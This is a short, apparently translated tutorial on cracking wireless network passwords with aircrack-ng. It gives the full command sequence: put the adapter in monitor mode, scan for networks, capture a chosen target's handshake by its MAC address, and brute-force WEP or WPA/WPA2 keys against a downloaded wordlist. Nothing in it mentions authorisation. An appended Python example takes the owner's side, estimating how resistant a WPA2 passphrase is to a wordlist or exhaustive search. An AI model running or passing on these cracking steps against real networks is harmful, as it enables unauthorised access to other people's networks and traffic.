Aircrack-ng wireless cracking summary, aircrack-ng

Source: Internet
Author: User

On Linux, I use an Ubuntu environment. On Ubuntu you can install it directly:

sudo apt-get install aircrack-ng

Other Linux systems should be able to install it with:

yum -y install aircrack-ng

If the package download is not routed around the firewall ("fanqiang"), it is very slow.


Method:

1. Make sure that your wireless adapter is enabled: use ifconfig to check whether wlan0 (or another wireless adapter) is up. If it is not, the subsequent steps cannot be performed.

You can use ifconfig -a to check whether a wireless adapter is present, and then run ifconfig wlan0 up to start it (wlan0 is the name of the wireless adapter shown by ifconfig -a).

2. Put the NIC into monitor (listening) mode:

sudo airmon-ng start wlan0

3. View the wireless networks and capture wireless data packets:

sudo airodump-ng mon0 

Note: mon0 is the name of the monitor-mode interface created when your wlan adapter starts listening. The following problem may occur:

rtl8187 - [phy1]SIOCSIFFLAGS: Name not unique on network

If this problem occurs, solve it as follows:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
sudo airodump-ng wlan0

Or:

airmon-ng check kill
airmon-ng start <interface>
airodump-ng wlan0mon

However, this leaves network management disabled. The service can be stopped and started with:

sudo service network-manager stop   # stop the NetworkManager service
sudo service network-manager start  # start the NetworkManager service

If everything is okay:

The wireless networks within range are displayed. PWR indicates the signal value; a larger value indicates a stronger signal. ESSID is the network name. ENC is the encryption method (WEP is the easiest to crack; WPA and WPA2 can only be cracked by brute force).

Find the ESSID you want to crack.

4. After determining the target, capture its traffic:

sudo airodump-ng -c 6 --bssid <target's MAC> -w file mon0

-c 6 is the channel of the signal, shown in the CH column.

<target's MAC> is the MAC address of the access point you want to crack.

file is the name prefix of the capture file in which the captured data, including the handshake with the target, is stored.

5. After receiving enough packets (that is, data), start cracking.

sudo aircrack-ng file-01.cap

file-01.cap is the capture file holding the data stored after the handshake.

If it is a WEP password, it can be cracked directly once enough packets (10,000) have been received.

For WPA/WPA2 encryption, you must capture the handshake packet before you can start brute-force cracking, and you need a password file (one is available at http://static.hackersgarage.com/darkc0de.lst.gz). If the password is complex enough, such a password file will not be enough, and you need to build a more complex password file yourself.

sudo aircrack-ng -w dic file-01.cap

The password can be obtained after successful cracking.
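
Seen from the network owner's side, the WPA/WPA2 step above only succeeds when the passphrase is in the password file. The Python below is an added example, not part of the original article: it derives the WPA2 master key (PBKDF2-HMAC-SHA1 with the SSID as salt), checks a passphrase against a wordlist, and estimates how long an exhaustive search would take. The wordlist, the SSID ExampleNet and the guess rates are constructed assumptions.

```python
import hashlib
import math
import time

# Constructed sample wordlist standing in for a real password file.
CONSTRUCTED_WORDLIST = ["password", "12345678", "qwertyuiop", "letmein123"]

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA/WPA2 passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def in_wordlist(passphrase: str, words) -> bool:
    """True if a dictionary run using this list would reach the passphrase."""
    return passphrase in {w.strip() for w in words}

def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Entropy in bits of a uniformly random passphrase of this shape."""
    return length * math.log2(alphabet_size)

def years_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Years needed to try every passphrase of this shape at the assumed rate."""
    return alphabet_size ** length / guesses_per_second / (365 * 24 * 3600)

def measure_rate(samples: int = 20) -> float:
    """PMK derivations per second on this machine (single core, plain hashlib)."""
    start = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(f"candidate{i:04d}", "ExampleNet")  # ExampleNet: constructed SSID
    return samples / (time.perf_counter() - start)

if __name__ == "__main__":
    rate = measure_rate()
    print(f"local derivation rate: {rate:.0f} passphrases/s")
    for label, pw, alphabet in [("8 digits", "12345678", 10),
                                ("16 random alphanumerics", "x9Lq2vTz7pWm4kRb", 62)]:
        print(f"{label}: in wordlist={in_wordlist(pw, CONSTRUCTED_WORDLIST)}, "
              f"{keyspace_bits(alphabet, len(pw)):.1f} bits, "
              f"{years_to_exhaust(alphabet, len(pw), rate):.3g} years to exhaust")
```

Because the SSID is the salt, the same passphrase gives a different key on a network with a different name, and each guess costs 4096 HMAC rounds.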
